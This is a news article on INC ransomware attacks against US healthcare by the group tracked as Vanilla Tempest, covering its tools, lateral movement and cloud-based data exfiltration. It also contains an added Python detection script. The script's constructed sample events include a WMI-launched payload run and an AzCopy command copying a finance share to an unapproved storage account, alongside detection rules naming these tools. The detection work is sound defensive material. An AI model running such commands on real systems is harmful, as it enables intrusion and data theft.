INC ransomware hits US healthcare, linked to Vanilla Tempest

September 20, 2024
Tags: Vanilla Tempest, Cybercriminals, US Healthcare Sector, INC Ransomware

A financially motivated campaign targeting the US healthcare sector has been observed deploying INC, a recently emerged ransomware strain. The activity has been attributed to a known threat actor previously identified as DEV-0832 and now tracked as ‘Vanilla Tempest.’

According to security experts, Vanilla Tempest is orchestrating these attacks by leveraging infections from GootLoader, a notorious malware family deployed by the group known as Storm-0494. Once the initial infection is established, the attackers deploy tools such as the Supper backdoor, the AnyDesk remote monitoring and management (RMM) tool, and the MEGA file synchronisation platform to carry out their malicious activities. These tools help facilitate their control over compromised systems and allow them to infiltrate networks further.

Following the initial breach, the attackers move laterally within the network using Remote Desktop Protocol (RDP) and the Windows Management Instrumentation (WMI) Provider Host to drop the INC ransomware payload. This tactic enables the attackers to spread the ransomware across the infected network while avoiding detection.

Vanilla Tempest has been actively targeting several industries since at least July 2022, including healthcare, education, IT, and manufacturing.

The group has previously used well-known ransomware families such as BlackCat, Quantum Locker, Zeppelin, and Rhysida in their operations. Vanilla Tempest, also identified by some researchers as Vice Society, is notable for its approach of reusing existing ransomware lockers rather than developing custom malware from scratch.

In addition to these findings, other cybercriminal groups like BianLian and Rhysida have been observed using legitimate cloud-based tools to exfiltrate sensitive data. These groups have repurposed Microsoft’s Azure Storage Explorer and AzCopy tools—typically used for managing Azure cloud storage—to transfer large amounts of stolen data undetected to external cloud storage.
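The behaviours described above (WMI Provider Host used to land a payload, AzCopy repurposed to push data to attacker-controlled storage, and an unapproved RMM tool such as AnyDesk appearing on an endpoint) are all visible in ordinary process-creation telemetry. The script below is an added example, not code from the article or from any of the researchers it cites: it runs three simple detection rules over a handful of constructed process-creation events. The `host=... parent=... image=... cmdline="..."` line format, the storage-account allow-list `corpbackup01`, and the sample hostnames and paths are all invented for the example; a real deployment would read Sysmon Event ID 1 or EDR process events and tune the allow-lists against its own baseline.

```python
"""Detection rules over process-creation events for three behaviours named in the article:
  1. WmiPrvSE.exe (the WMI Provider Host) spawning a child process, the footprint of
     remote WMI execution being used to drop a payload;
  2. AzCopy / Azure Storage Explorer copying to a storage account outside the allow-list;
  3. an RMM tool the organisation has not approved (AnyDesk here) being executed.
The log format, sample events and allow-lists are constructed for this example."""
import ntpath
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Hypothetical allow-list of storage accounts the organisation legitimately copies to.
ALLOWED_STORAGE_ACCOUNTS = {"corpbackup01"}
# Binaries that WmiPrvSE.exe has little reason to launch; treated as higher severity.
LOLBIN_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe", "wscript.exe", "mshta.exe"}
AZURE_COPY_TOOLS = {"azcopy.exe", "microsoftazurestorageexplorer.exe"}
UNAPPROVED_RMM = {"anydesk.exe"}

# Matches key=value pairs; a double-quoted value may contain spaces.
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Extracts the storage-account name from an Azure Blob URL.
BLOB_URL = re.compile(r"https://([a-z0-9]+)\.blob\.core\.windows\.net", re.I)


@dataclass
class ProcEvent:
    host: str
    parent: str   # full path of the parent image
    image: str    # full path of the new process image
    cmdline: str


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed key=value log line into a ProcEvent."""
    fields = {k: v.strip('"') for k, v in KV.findall(line)}
    return ProcEvent(fields.get("host", "?"), fields.get("parent", ""),
                     fields.get("image", ""), fields.get("cmdline", ""))


def analyse(ev: ProcEvent) -> Optional[Finding]:
    """Apply the three rules in order and return the first finding, if any."""
    parent = ntpath.basename(ev.parent).lower()
    image = ntpath.basename(ev.image).lower()

    # Rule 1: any child of the WMI Provider Host is worth a look; shells and
    # script hosts launched this way are the classic remote-execution pattern.
    if parent == "wmiprvse.exe":
        severity = "high" if image in LOLBIN_CHILDREN else "medium"
        return Finding(ev.host, "wmi_child_process",
                       f"{severity}: WmiPrvSE.exe spawned {image}: {ev.cmdline}")

    # Rule 2: Azure copy tooling writing to a storage account not on the allow-list.
    if image in AZURE_COPY_TOOLS:
        for account in BLOB_URL.findall(ev.cmdline):
            if account.lower() not in ALLOWED_STORAGE_ACCOUNTS:
                return Finding(ev.host, "azcopy_unapproved_destination",
                               f"{image} -> {account}.blob.core.windows.net")

    # Rule 3: an RMM tool the organisation does not sanction.
    if image in UNAPPROVED_RMM:
        return Finding(ev.host, "unapproved_rmm_tool", f"{image} executed from {ev.image}")
    return None


def scan(lines: Iterable[str]) -> List[Finding]:
    """Run every line through the rules and collect the findings."""
    return [f for f in (analyse(parse_event(line)) for line in lines) if f is not None]


# Constructed sample events: one benign, then one hit per rule, plus a benign AzCopy run.
SAMPLE_EVENTS = [
    'host=WS01 parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\notepad.exe cmdline="notepad.exe"',
    'host=WS07 parent=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe image=C:\\Windows\\System32\\cmd.exe '
    'cmdline="cmd.exe /c C:\\Users\\Public\\update.exe"',
    'host=SRV02 parent=C:\\Windows\\explorer.exe image=C:\\Tools\\azcopy.exe '
    'cmdline="azcopy.exe copy C:\\Shares\\Finance https://corpbackup01.blob.core.windows.net/backup --recursive"',
    'host=SRV02 parent=C:\\Windows\\System32\\cmd.exe image=C:\\Users\\Public\\azcopy.exe '
    'cmdline="azcopy.exe copy C:\\Shares\\Finance https://xk9q3stage.blob.core.windows.net/out --recursive"',
    'host=WS07 parent=C:\\Windows\\explorer.exe image=C:\\Users\\j.doe\\Downloads\\AnyDesk.exe cmdline="AnyDesk.exe"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.rule}] {finding.host}: {finding.detail}")
```

The first rule deliberately flags every child of WmiPrvSE.exe rather than only known script hosts, because the payload dropped over WMI may have any name; severity, not suppression, is what the LOLBIN list adjusts. The AzCopy rule keys on the destination account, which is the one thing an attacker cannot disguise while still landing data in their own storage.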

Security experts emphasise the importance of vigilance, especially for industries like healthcare, where cyberattacks can have severe consequences. As attackers continue to improve their tactics, organisations are urged to strengthen their defences and prepare for the ongoing threat of large-scale ransomware attacks.
